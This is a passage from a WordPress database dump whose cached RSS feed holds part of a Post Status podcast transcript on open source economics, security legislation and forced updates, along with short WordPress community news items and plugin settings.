of plugin and that number is over your head as your business value and, and you wanna flip, you know, you wanna sell. Like this is, things have been moving in that kind of direction. I, yeah, call it financial, a financialized market.</p>\n\n\n\n<p>And I don\'t, I don\'t think that\'s really in most people\'s interests when, you know, it\'s like, When the housing market isn\'t people\'s houses anymore and or their homes or community or neighborhood, it\'s just, what\'s the number on this here today and what can I get for it if I were to sell it? Give me a number.[00:39:00]</p>\n\n\n\n<p>You know, there was a bit, there\'s been a bit of a movement in that direction. I question the, the health of that, but it\'s really a question of pH kinda economic. Culture, open source culture philosophy. What kind of market ecosystem do you want to have? And I think from above they\'re being pretty clear that they want something more cooperative down there, which is tough for people to swallow because on a higher level, these are, they\'re the corporate entities that are playing full bore, um, corporate capitalism, you know, on a, on a higher level.</p>\n\n\n\n<p>Mm-hmm. , um, where. No one\'s suggesting co-opetition between hosting entities. Entities I love, but maybe they should, you know, I mean, in a way, um, it is, it is throughout open source. I mean, there has to be some level.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I\'ll suggest that on Twitter. Yeah. You\'ll be breaking with me. I, I think</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I\'m really like the cons really in, in [00:40:00] favor of that.</p>\n\n\n\n<p>I think I\'m not a, I\'m not a unrestricted market person and I, I don\'t think the idea of a commons. works with that. You do need limits and at least a culture with some kind of consensus on, hey, we don\'t overly extract this here and there. And, but that\'s right. That\'s, that\'s not a conversation you can have in normal corporate America.</p>\n\n\n\n<p>Um, Oh no, But it isn\'t, it is an open source thing and, um, how do we help each other grow? While in the midst of some degree of competition, um, that\'s a really worthy discussion. And uh, it\'s unfortunate. I think that the trust issues are high and the confusion and eventually misinformation may be high and we can\'t have that appropriate conversation.</p>\n\n\n\n<p>I hope we can, but mm-hmm. . [00:41:00] Yeah. Well enough said about that one. I\'m not gonna speculate where it\'s gonna go, but it\'s been a weekend. It\'s been a season,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Yeah. Oh,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> The um, the last thing I was gonna ta I don\'t think we\'ll really tackle it too much. No one\'s looking, no one\'s looking at this. Have you? Um, I haven\'t found a single person. I\'m, I\'m start. Poke around and mm-hmm. more technical sources. And I\'d really love for feedback from, from anyone who has, um, closer familiarity with government policy that\'s emerging around security.</p>\n\n\n\n<p>Um, there\'s a, there\'s finally, this stuff goes back a few years, but there\'s a senate bill, um, that\'s very specifically targeting open source and security and how we can, how things can be changed. [00:42:00] to, I think ultimately is, you know, it\'s about mitigating risk that, um, the US federal government, really any go, any government\'s always concerned with risk.</p>\n\n\n\n<p>They\'re highly invested in open source. Um, and it\'s not open source in particular, Most people will point out software across the board. Um, how can this be exploited and hacked has gotten into the public eye and into. , the, uh, the eye of people in, um, in government whose job is to focus on things like supply chain, security, that, you know, things that are considered public infrastructure, um, in a national interest that we need to secure and can\'t just have people hacking through, exploiting, you know, whatever they think is going on.</p>\n\n\n\n<p>But , there have been plenty of examples and there always will. Will be some. [00:43:00] So we just, we haven\'t really seen that, um, that come down before and I think we will soon. So have you, have you seen anyone talking?</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Not really. Um, it seems like something Rob would tackle, um, top Yeah, I think you\'d be interested, but, um, I\'m, My input is as someone who has worked for the state and federal government in a tech capacity, I don\'t have a lot of faith in this.</p>\n\n\n\n<p>Right? Can I say that?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Why? Get in trouble? I don\'t think you\'d be,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Will they come snatch my microphone? Yeah. bust through my window in the back.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Um, you aren\'t gonna quote the giver, are you?</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Oh, I got other quotes, but I, One per episode. It\'s all get, um, Oh God.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> I\'m from the government and I\'m here to help.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Please. No. Um. I, [00:44:00] I understand. Okay. The big, uh, the big hacks that have been going on, like the, having the Uber , um, you know, there are a lot of con security concerns out there. I get it. But I don\'t see, I guess I just don\'t know enough about this bill to see what they\'re going to do to help. I just feel like it\'s more government regulation.</p>\n\n\n\n<p>I feel like I found very, I feel like I found very. Pro Capitalism this episode. Hmm. I\'m thinking</p>\n\n\n\n<p><strong>Dan Knauss:</strong> on the one hand. Yeah, but on on the other. Yeah.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Ah, stop me when you see, when you hear stuff. I\'m just kidding. I\'m kidding. Um, dang. I do now I have to, I have to sit with my thoughts now. Um, no. I get the security issues, but I really don\'t see what they\'re gonna do to help, is basically what I,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Well, it is, I think everyone does have a common problem.</p>\n\n\n\n<p>It\'s mostly. D updates. . Mm-hmm. , The, and how they get. Um, so if you have unup updated, the, the largest problem, you have a really, really big [00:45:00] attack surface. Like the log four j log four shell thing was under the auspices of Apache Project. Uh, it wasn\'t that something wasn\'t unmaintained and, but there was, um, uh, a, a security vulnerability that was discovered that had been around a long time.</p>\n\n\n\n<p>Just no one had noticed it. And then you needed to patch it quickly and, and distribute. All around something that\'s very widely used, and that is the, the tricky spot. How do you get mm-hmm. , you can\'t. So in terms of, of WordPress, there\'s all these really old installs out there. Mm-hmm. , Um, and some are so old, I, you can\'t push an update too.</p>\n\n\n\n<p>Mm-hmm. , you\'d have to have anyway. Forced updates have become more of a, a less controversial thing. There was a day, oh probably. Not too long ago, year or two, um, when it was, it was controversial for, uh, again, a decision [00:46:00] made by through unknown processes and deciders to we\'re just gonna push a forced update on an insecure plugin or some core thing, um, that\'s emerged and, and that can be done just pushed down.</p>\n\n\n\n<p>And I think that\'s just becoming more of, of the norm for security. Reasons and how that, there hasn\'t been a really discussion of that, how that fits in the ethics of open source. Um, if I choose to use this software, can you push changes to it against my, um, consent or without my consent and change my client\'s sites and stuff like that.</p>\n\n\n\n<p>Um, yeah, I think we\'ve kind of moved into a place where, It\'s kind of like getting a vaccination, like, like, Oh Lord, please, you wanna opt out? You wanna opt out to this? Um, there\'s a real problem, um, to doing that, but it, I mean, I, that too. I, I, These are, these are [00:47:00] two sides to the openness and, and freedom and rights, Individual rights versus collective.</p>\n\n\n\n<p>Um,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I will not be hopping into the vaccine debate. You know, I\'ll debate anything that is scary to me. , I\'ll still debate it, but people are scary when we talk about vaccines. I get scared. Um, but I, I think that to me, where it goes to me in my mind is for security updates. We don\'t talk enough about, about how computer illiterate, I guess is how you would.</p>\n\n\n\n<p>Mm. A lot of society is getting, especially when you think about the younger generations who are dependent on their phones and tablets and they don\'t really know how to use computers anymore. Sure. It\'s like, um, you have older people who, you know, have struggled with that, and now we have a younger generation and then it\'s like us in the middle.</p>\n\n\n\n<p>So I think, I think that\'s going to be an issue because we\'re forcing people to. It\'s update and they don\'t know, You know, they know one version they [00:48:00] can\'t learn, or not that they cannot learn newer versions, but there is not a lot of adequate education out there to learn newer things. And I\'m not just talking about WordPress kind that\'s in my mind, but that goes through a whole host of other software.</p>\n\n\n\n<p>I just, I think we need more literacy before we do stuff like that. I mean, I\'m not opposed to it at all. Um, I.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> It would certainly help for trust again, like, um, if you, I think more and more people are just expecting and, and vaguely, maybe they don\'t even understand that their devices are being updated all the time.</p>\n\n\n\n<p>Yeah, I monitored all the time.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Definitely. Don\'t they? Definitely. Don\'t you remember when they said 5G was like causing covid? Did you hear that?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Um, that okay.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Conspiracy theory. That was one. Yeah. Yeah. And I was like, What? And like it was, people were send me stuff, they were like, You\'re in tech. Is this true?</p>\n\n\n\n<p>And I\'m like, What? And I\'m like, Why would you even begin to believe [00:49:00] this? Where is the correlation? It\'s like people really don\'t. Anything . And it\'s like, you know, I\'m not calling people stupid or ignorant. Please, if you\'re listening and you sent me a covid conspiracy theory, I am not attacking you. Um, I, it\'s just that people are, there\'s too much lack of information.</p>\n\n\n\n<p>I feel like that\'s the theme of this, uh, of this episode. If you don\'t give people enough information and literacy, they\'ll speculate. They\'ll create their own narratives and then they\'ll spread them. Right? And then we have all this what? And then we\'ll hear stuff when we say what. Yeah. What I do that like 16 times a day, so Right.</p>\n\n\n\n<p>It\'s, they, they have so much more to do than just force updates, but I don\'t have the faith that they will do that. That\'s me.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Well, there, there\'s a lot, there\'s a lot that can be done in, in testing and and security practices to make more secure product, but there\'s always gonna be stuff that just needs a hot fix.</p>\n\n\n\n<p>It needs enough to push to it. Dependencies that aren\'t even within the project, but that we use and that some other project [00:50:00] uses. Everyone\'s got to be able to, um, verify what they\'re using, what version it is, maintenance status, and how do you, how do you quickly update a lot of stuff across the network.</p>\n\n\n\n<p>I think that\'s all good, but yeah. What, what you\'re saying with a highly, with something, um, as ubiquitous as WordPress or. Apps on your phone. Um, people aren\'t, it\'s better if you can get them educated enough to trust that, okay, this is how this is done and mm-hmm people are trying to keep this secure and here are the risks and so on.</p>\n\n\n\n<p>And, um, maybe there\'s some kind of catchall consent. If you know you\'re using this, this is what\'s gonna happen. It would be great if, as a community, talked more about those things too, and then mm-hmm. , um, informed people of, of what to expect about security with client work. It\'s totally, [00:51:00] absolutely necessary to, to explain about the importance of updates, maintenance, and security issues, and, and that being a constant ongoing process.</p>\n\n\n\n<p>But when, when people don\'t understand and then something happens, you get what? The demonn haunted world. I keep thinking of this essay that that\'s a Carl Sagan book. And Corey doctor wrote a great essay a few years back when, when Volkswagen was uh, uh, gaming their catalytic converters or what, whatever that was when they, whoever hooked the hook, the cars up for testing to emission standards.</p>\n\n\n\n<p>Um, it. The computer would realize, ah, we\'re being tested, so let\'s cheat. And we go into cheat mode and give a different output than, um, when you\'re on the road, you want more power delivered to the user and it\'s actually over emission standards. They got caught for that, but it was a sophisticated software [00:52:00] thing.</p>\n\n\n\n<p>BMW did this to, uh, I wanna pronounce these in German way, Ba a. I, I don\'t know how many did this, but I was talking to a friend of a friend musician who bought one of their sprinter vans. He\'s really, uh, fancy bmw, um, vans, and they got, they had to do a recall on all their, Their catalytic converters, um, because they had a cheat system in it too, I think.</p>\n\n\n\n<p>And they had agreed to some, you know, there was a, there was litigation and they just agreed to replace it all. Not that they had done anything wrong or something like that. And, and he was in the states, he\'s Canadian, bought this thing in, in Canada and it was in the States and the computer on the car, and his van started saying, You have 10 more starts.</p>\n\n\n\n<p>You gotta get this to a dealer, Do the recall, have the part swapped out, and if you don\'t and, and you need to do that in 10 more starts, you start, you stop and start 10 times this thing\'s not gonna, it\'s [00:53:00] gonna be towed, you know, It will not, your, your vehicle will no longer function. Um, so it\'s like ransomware built into thereby the, the manufacturer of your vehicle.</p>\n\n\n\n<p>Um, huge. Shift from . I don\'t think you knew that that was even possible. They left the thing running.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> Well, , that reminds me. I do. Because that reminds me of the, the, I don\'t know if I\'ve never had it, but I\'ve known people who\'ve had these type of cars. If you don\'t make a payment on your car, you miss a payment, they cut.</p>\n\n\n\n<p>They really just lock your car and then you can\'t crank your car up. Yeah, you can\'t use your car. You\'ve never heard of that?</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Like they do remotely through the card. They do it remotely disabled.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I\'m, I\'m, I thought that happened to many people. Like I\'ve had people go to pump gas and then they can\'t crank their car up and they\'ll say, Oh, you owe it\'s money.</p>\n\n\n\n<p><strong>Dan Knauss:</strong> My car is older than my oldest kid. I have a 1997 crv. Like the early years were, were really good. I have a Honda [00:54:00] guy, um, who um, yeah, like, yeah, I\'m an old tech person, , so you couldn\'t Yeah,</p>\n\n\n\n<p><strong>Nyasha Green:</strong> that\'s, but that\'s like, that was kind of old. That\'s like, I learned of that when I was like a teenager and that was like, oh my.</p>\n\n\n\n<p>I am about to turn 32. I was around 15. That was, I\'m doing math 17 years ago, .</p>\n\n\n\n<p><strong>Dan Knauss:</strong> So yeah, I think that\'s, I stuff should be built to last some things and maintain. Oh yeah, definitely. And I don\'t like the idea of. Of being surveilled and controlled remotely. Oh, yeah. Um, and that\'s, um, that\'s the world we\'re moving into.</p>\n\n\n\n<p>Mm-hmm. and to some extent there, you know, well there\'s real abuse and ethics issues and uh, personal autonomy. And I don\'t think that kind of car system is at all what anyone in open source wants or, or just coming. But there\'s always a trade off to, uh, with security, how do we, how do we protect. [00:55:00] Ourselves, Um, the most people efficiently.</p>\n\n\n\n<p>And it\'s, it\'s by overriding, you know, anyone who might individually say, Wait a minute, I wanna evaluate this update code before, you know, most people are just gonna sit on an unup updated thing and mm-hmm not know what\'s going on. And that\'s, um, ultimately you have authorities saying that\'s just not okay cuz it\'s a security risk to.</p>\n\n\n\n<p>Much more, much more significant higher level interest than, you know, Bob Smith with his whatever software he is running. Mm. Well, I think that\'s a, that\'s just a fascinating, ethical, intellectual thing, and I, I hope, I hope that we can find a few people to kind of dig more into that as, as that goes along.</p>\n\n\n\n<p>But, um, yeah, trust. Everything\'s about trust.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> You [00:56:00] made me think about trust falls. Trust. Trust falls when someone like stands on a chair and you all hold hands. Oh, that,</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. I\'ve never done that. Uh, no. I didn\'t</p>\n\n\n\n<p><strong>Nyasha Green:</strong> want, I was scared. Yeah. I didn\'t trust, I did not trust those people. But, but no, you\'re right.</p>\n\n\n\n<p>Trust is, is that today\'s word? That\'s a big word for Elmo. .</p>\n\n\n\n<p><strong>Dan Knauss:</strong> Yeah. Just cause people are being, just cuz people are being nice and communicating well with you doesn\'t, you know, you assume good intentions, but I mean, trust can be betrayed in so many ways or failed, um, even with the best of intentions. And I think how we recover from it, there\'s no ideal state, you know, no human group is gonna have pure trust unless they\'re completely in denial, like a cult or something about how everything is awesome.</p>\n\n\n\n<p>There\'s always damage. In and histories of, of um, reasons not to trust each other in any long relationship. [00:57:00] And you kind of have to find a way to be resilient through that and recover from it and reassure each other. Yeah, we\'re aligned. We want the same things, pretty much. Um, I\'m not, I, you know, and I\'ve got your back and that\'s what we need.</p>\n\n\n\n<p>It\'s hard to come by.</p>\n\n\n\n<p><strong>Nyasha Green:</strong> I agree. Trust in communication.</p>\n</div><p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 14:16:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"<span class=\'p-author h-card\'>Olivia Bisset</span>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"Post Status: Diversifying Revenue, the 50% Coding / 50% Marketing Lifecycle, Active Install Clawback, and Turbo Admin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127096\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:121:\"https://poststatus.com/diversifying-revenue-the-50-coding-50-marketing-lifecycle-active-install-clawback-and-turbo-admin/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5699:\"<div class=\"e-content\">\n<h2 id=\"h-wordpress-design-development-around-the-web-for-the-week-of-october-3\">WordPress Design & Development Around the Web for the Week of October 3</h2>\n\n\n\n<div class=\"wp-container-43 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">Here’s a glimpse of what’s going on in the world of design and development in the WordPress space this past week. As I look around the Post Status Slack and the chatter on Twitter, this week has been filled with conversations emphasizing the struggle of running a business as a solo devpreneur. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">3</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<h2>Diversifying Revenue Streams as a Solo Devpreneur</h2>\n\n\n\n<p>Web Developer, Entrepreneur, Organizer, and <a href=\"https://carlalexander.ca/\">The Man in the Arena</a> Carl Alexander has shared his journey creating <strong><a href=\"https://ymirapp.com/\">Ymir</a></strong>, writing <a href=\"https://carlalexander.ca/object-oriented-programming-wordpress/\">a book</a>, freelancing, and how much he actually makes from all that to live each month. TL:DR; <a href=\"https://twitter.com/twigpress/status/1577668588923559937?s=20&t=fkpkDh0STrS3M6ql88yBIg\">Not as much</a> as you’d think. This kind of transparency into the entrepreneurship side of WordPress can be so valuable and helpful for everyone to see. I suspect many of us can relate to this, especially in the WordPress space where our abilities as developers, designers, and builders are often taken for granted or undervalued. Carl’s answer is creating a <strong>Github</strong> sponsored page, which is a great way to show appreciation for a developer\'s work, especially the free plugins that they maintain. <strong>Aurooba Ahmed</strong> has made <a href=\"https://github.com/aurooba/sponsor-wp-contributors\">a list of developers you can sponsor</a> as well.</p>\n\n\n\n<h2>The 50% Coding 50% Marketing Lifecycle</h2>\n\n\n\n<p>We see it all the time: some application or website comes out with half the features of a similar idea you’ve been toiling away on for months, maybe years, but they get all the traction because they market the heck out of their brand. Chances are they also probably hired a small marketing team or agency to help them, and for many of us, we don’t have that luxury. Enter <a href=\"https://www.bannerbear.com/blog/why-you-should-do-50-coding-and-50-marketing-as-a-solo-tech-founder/\">the 50:50 concept</a> from <strong>Jon Yongfook</strong> of <strong><a href=\"https://www.bannerbear.com/\">Bannerbear</a></strong>. It sounds like it would be complicated but it’s really simple. </p>\n\n\n\n<h2>Oh Look, Somebody Took Something Away and Didn’t Communicate About It Well, That Tracs</h2>\n\n\n\n<p>This week’s #WPDrama has surrounded the abrupt removal of the <em>install growth charts</em> for security reasons on <a href=\"http://wordpress.org/\">WordPress.org</a> and the <a href=\"https://meta.trac.wordpress.org/ticket/6511\">Trac ticket created</a> in response to that from Post Status member <strong>Mark Zahra</strong> which highlighted the frustration felt across the plugin community. I cannot stress enough that all of these frustrations could have been avoided by good communication with the community right after the removal. Instead, everyone was left to piece together different conversations on <strong>Twitter</strong> and <strong>Make WordPress Slack</strong> to understand what might be the future for getting similar or even better analytics into the <strong>Plugin Directory</strong>. As of this writing, there still is no response from the team that removed this feature or what a process might look like for future analytics improvements. Again, an open-source project the size of WordPress should have a team just to help write a synopsis of major changes so anyone can understand the why, when, where, and what’s next.</p>\n\n\n\n<div class=\"wp-container-44 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h2>Cool Tool</h2>\n\n\n\n<p>Each week we feature one cool tool that can help make your life easier as a WordPress builder.</p>\n\n\n\n<h2>Move Around The WordPress Admin Faster and Cleaner</h2>\n\n\n\n<p>Let me introduce you to <strong><a href=\"https://turbo-admin.com/\">Turbo Admin</a></strong>, from Post Status member <strong><a href=\"https://twitter.com/magicroundabout\">Ross Wintle</a></strong>. This little tool makes the WordPress Admin feel more like using the <strong>Siri</strong> or <strong>Alfred bar by giving you a command palette</strong> and a few <code>wp-admin</code> improvements like being able to hide all notices. Turbo Admin is packaged primarily as a browser extension for <strong>Chrome</strong>, <strong>Edge</strong>, and <strong>Firefox</strong>, but it also comes as a plugin. What’s really cool about the extension is that you can use it on any site you have <code>wp-admin</code> access to with no need to install the plugin. This makes it very useful on client sites without adding another plugin to their stack.</p>\n</div></div>\n</div><p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 13:45:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"<span class=\'p-author h-card\'>Daniel Schutzsmith</span>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"Akismet: New API Endpoints to Keep Track of your Akismet Usage\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"http://blog.akismet.com/?p=2429\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://blog.akismet.com/2022/10/07/new-api-endpoints-to-keep-track-of-your-akismet-usage/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:887:\"<p>We&#8217;ve recently deployed, and documented, two new <a href=\"https://akismet.com/development/api/#detailed-docs\">API endpoints</a> that can help you automate keeping track of your Akismet usage, as well as of which sites are querying our API using your Akismet key.</p>\n\n\n\n<ul>\n<li><a href=\"https://akismet.com/development/api/#usage-limit\">Usage Limit</a>: an endpoint to keep track of your Akismet API usage for the current month.</li>\n\n\n\n<li><a href=\"https://akismet.com/development/api/#key-sites\">Key/Sites Activity</a>: an endpoint to keep track of the sites that are using your API key.</li>\n</ul>\n\n\n\n<h3>We&#8217;re Here to Help</h3>\n\n\n\n<p>If you need help integrating with these, or any other of our <a href=\"https://akismet.com/development/api/#detailed-docs\">API endpoints</a>, please don’t hesitate to&nbsp;<a href=\"https://akismet.com/contact/\">get in touch</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 13:41:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Stephane Daury\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"Do The Woo Community: WooBits: The Future HQ of Do the Woo in Porto, Portugal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73074\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://dothewoo.io/the-future-headquarters-of-do-the-woo-in-porto-portugal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:421:\"<p>I haven\'t talked much about our move to Porto, Portugal and what this means to Do the Woo and its next iteration.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/the-future-headquarters-of-do-the-woo-in-porto-portugal/\">WooBits: The Future HQ of Do the Woo in Porto, Portugal</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 10:01:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Thu, 20 Oct 2022 18:08:33 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Thu, 20 Oct 2022 18:00:35 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 1\";s:16:\"content-encoding\";s:2:\"br\";}}s:5:\"build\";s:14:\"20211221080300\";}','no'),(3457,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:17:\"admin@cteisys.com\";s:7:\"version\";s:5:\"6.0.3\";s:9:\"timestamp\";i:1666051202;}','no'),(2117,'jetpack_dismissed_connection_banner','1','yes'),(2196,'wp-smush-lazy_load','a:9:{s:6:\"format\";a:6:{s:4:\"jpeg\";b:1;s:3:\"png\";b:1;s:4:\"webp\";b:1;s:3:\"gif\";b:1;s:3:\"svg\";b:1;s:6:\"iframe\";b:1;}s:6:\"output\";a:4:{s:7:\"content\";b:1;s:7:\"widgets\";b:1;s:10:\"thumbnails\";b:1;s:9:\"gravatars\";b:1;}s:9:\"animation\";a:4:{s:8:\"selected\";s:6:\"fadein\";s:6:\"fadein\";a:2:{s:8:\"duration\";i:400;s:5:\"delay\";i:0;}s:7:\"spinner\";a:2:{s:8:\"selected\";i:1;s:6:\"custom\";a:0:{}}s:11:\"placeholder\";a:3:{s:8:\"selected\";i:1;s:6:\"custom\";a:0:{}s:5:\"color\";s:7:\"#F3F3F3\";}}s:7:\"include\";a:7:{s:9:\"frontpage\";b:1;s:4:\"home\";b:1;s:4:\"page\";b:1;s:6:\"single\";b:1;s:7:\"archive\";b:1;s:8:\"category\";b:1;s:3:\"tag\";b:1;}s:13:\"exclude-pages\";a:0:{}s:15:\"exclude-classes\";a:0:{}s:6:\"footer\";b:1;s:6:\"native\";b:0;s:8:\"noscript\";b:0;}','yes'),(2197,'skip-smush-setup','1','yes'),(2202,'dir_smush_stats','a:2:{s:9:\"dir_smush\";a:2:{s:5:\"total\";i:0;s:9:\"optimised\";i:0;}s:14:\"combined_stats\";a:0:{}}','no');
/*!40000 ALTER TABLE `wp0y_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp0y_postmeta`
--

DROP TABLE IF EXISTS `wp0y_postmeta`;
